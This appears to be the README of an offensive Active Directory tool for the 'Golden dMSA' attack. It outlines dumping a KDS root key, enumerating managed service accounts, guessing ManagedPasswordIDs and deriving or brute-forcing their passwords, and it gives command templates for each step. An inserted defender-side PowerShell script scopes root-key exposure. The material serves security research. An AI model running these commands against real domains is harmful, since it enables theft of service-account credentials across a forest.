Golden dMSA: a tool that exploits the Golden dMSA attack against delegated Managed Service Accounts.
Golden dMSA
This tool exploits a new attack against delegated Managed Service Accounts (dMSAs) called the "Golden dMSA" attack. The technique allows attackers to generate passwords offline for every dMSA associated with a compromised KDS root key.
Additional information is available in the Golden dMSA blog post.
Attack steps
Phase 1: Key Material Extraction (prerequisite for the attack)
- Dump the KDS Root Key from a Domain Controller.
Phase 2: Enumerate dMSA accounts
- Brute-force or use LDAP to discover data on dMSA accounts in the forest: SamAccountName and SID.
Phase 3: ManagedPasswordID guessing
- Create a wordlist of possible values and identify the correct managedPasswordId and password hashes through targeted guessing.
Phase 4: Password Generation
- Generate valid passwords for any gMSA and dMSA associated with the compromised key.
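The four phases above make the blast radius of one compromised KDS root key clear: every gMSA and dMSA whose managedPasswordId points at that key. The script below is an added defender-side example, not code from the GoldendMSA project or its write-up. It inventories the forest's KDS root keys (metadata only, never the key material) and lists every gMSA/dMSA grouped by the root key its msDS-ManagedPasswordId references, so an administrator can scope exposure and review which accounts would be affected. Assumptions (none come from the page): the ActiveDirectory RSAT module is installed; the caller can read the KDS root key objects, which normally requires Enterprise Admins; dMSAs carry objectClass msDS-DelegatedManagedServiceAccount and gMSAs msDS-GroupManagedServiceAccount; and msDS-ManagedPasswordId follows the MS-GKDI MSDS-MANAGEDPASSWORDID layout in which the root key GUID starts at byte offset 24. The helper names are the author's own.

```powershell
# Added example (not part of the GoldendMSA project): scope which managed service accounts
# depend on which KDS root key, without reading or printing key material.
# Assumptions: ActiveDirectory RSAT module present; reader may list KDS root key objects;
# MS-GKDI MSDS-MANAGEDPASSWORDID layout: Version(4) Reserved(4) IsPublicKey(4)
# L0(4) L1(4) L2(4) RootKeyIdentifier(16) ... so the GUID sits at bytes 24..39.
Import-Module ActiveDirectory -ErrorAction Stop

function Get-RootKeyIdFromManagedPasswordId {
    # Returns the KDS root key GUID referenced by a msDS-ManagedPasswordId blob, or $null.
    param([byte[]]$Blob)
    if ($null -eq $Blob -or $Blob.Length -lt 40) { return $null }   # too short to hold the GUID
    return [guid]::new([byte[]]$Blob[24..39])
}

function Get-KdsRootKeyInventory {
    # Lists root key objects by their GUID name and creation time only.
    # msKds-RootKeyData (the secret) is deliberately never requested.
    $rootDse   = Get-ADRootDSE
    $container = 'CN=Master Root Keys,CN=Group Key Distribution Service,CN=Services,' +
                 $rootDse.configurationNamingContext
    Get-ADObject -SearchBase $container -LDAPFilter '(objectClass=msKds-ProvRootKey)' `
                 -Properties whenCreated |
        ForEach-Object {
            [pscustomobject]@{
                KeyId             = $_.Name
                Created           = $_.whenCreated
                DistinguishedName = $_.DistinguishedName
            }
        }
}

function Get-ManagedServiceAccountInventory {
    # Enumerates gMSAs and dMSAs in every domain of the forest and resolves the root key
    # each one is bound to (RootKeyId is $null when the attribute is absent or unreadable).
    $filter = '(|(objectClass=msDS-GroupManagedServiceAccount)' +
              '(objectClass=msDS-DelegatedManagedServiceAccount))'
    foreach ($domain in (Get-ADForest).Domains) {
        Get-ADObject -Server $domain -LDAPFilter $filter `
                     -Properties sAMAccountName, objectSid, objectClass, 'msDS-ManagedPasswordId' |
            ForEach-Object {
                [pscustomobject]@{
                    Domain         = $domain
                    SamAccountName = $_.sAMAccountName
                    Sid            = $_.objectSid.Value
                    Kind           = if ($_.objectClass -eq 'msDS-DelegatedManagedServiceAccount') { 'dMSA' } else { 'gMSA' }
                    RootKeyId      = Get-RootKeyIdFromManagedPasswordId $_.'msDS-ManagedPasswordId'
                }
            }
    }
}

# Report: every root key that exists, then the accounts whose passwords derive from each.
$keys     = @(Get-KdsRootKeyInventory)
$accounts = @(Get-ManagedServiceAccountInventory)

"KDS root keys in the forest: $($keys.Count)"
$keys | Format-Table KeyId, Created -AutoSize

$accounts | Group-Object RootKeyId | ForEach-Object {
    $label = if ([string]::IsNullOrEmpty($_.Name)) { '(root key not readable/absent)' } else { $_.Name }
    "Root key $label : $($_.Count) account(s) affected if this key is compromised"
    $_.Group | Format-Table Domain, SamAccountName, Kind, Sid -AutoSize
}
```

Run it from an administrative workstation with the RSAT modules loaded. A group labelled "not readable/absent" usually means the reader lacks rights to msDS-ManagedPasswordId on those accounts; that is expected for dMSAs read by a low-privilege account and is the reason the attack's third phase has to guess the value. Root key objects themselves should be readable only by Enterprise Admins, so any other principal able to list that container is worth investigating on its own.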
Usage
A couple of examples of useful commands:
Computation of gMSA passwords based on the KDS Root key and ManagedPasswordID:
$ GoldendMSA.exe compute -s <sid> -k <KDS Root key> -d <domain name> -m <ManagedPasswordID>
Converts a base64 password of a dMSA/gMSA to NTLM, AES128 and AES256:
$ GoldendMSA.exe convert -d <domain name> -u <username ending with $> -p <base64 password>
Create a wordlist for dMSA password brute-forcing:
$ GoldendMSA.exe wordlist -s <dMSA's sid> -d <dMSA's domain> -f <forest's domain> -k <id of kds root key>

Gathers info on dMSAs/gMSAs based on LDAP or RID enumeration:
$ GoldendMSA.exe info -d <domain name> -m ldap
$ GoldendMSA.exe info -d <domain name> -m brute -u <username> -p <password> -o <user's domain name> -s <gMSA's sid>
$ GoldendMSA.exe info -d <domain name> -m brute -u <username> -p <password> -o <user's domain name> -r <number>
Gathers info on KDS root keys (requires Enterprise Admins permissions):
$ GoldendMSA.exe kds
$ GoldendMSA.exe kds -g <guid of KDS root key>

Gathers info on KDS root keys (requires SYSTEM permissions on a DC):
$ GoldendMSA.exe kds --domain <domain name>
Brute-force a dMSA's password:
$ GoldendMSA.exe bruteforce -s <sid of dmsa> -i <kds root key id> -k <kds root key> -d <dmsa's domain> -u <dmsa (should end with $)> -t
$ GoldendMSA.exe bruteforce -s <sid of dmsa> -i <kds root key id> -k <kds root key> -d <dmsa's domain> -u <dmsa (should end with $)> -v
Download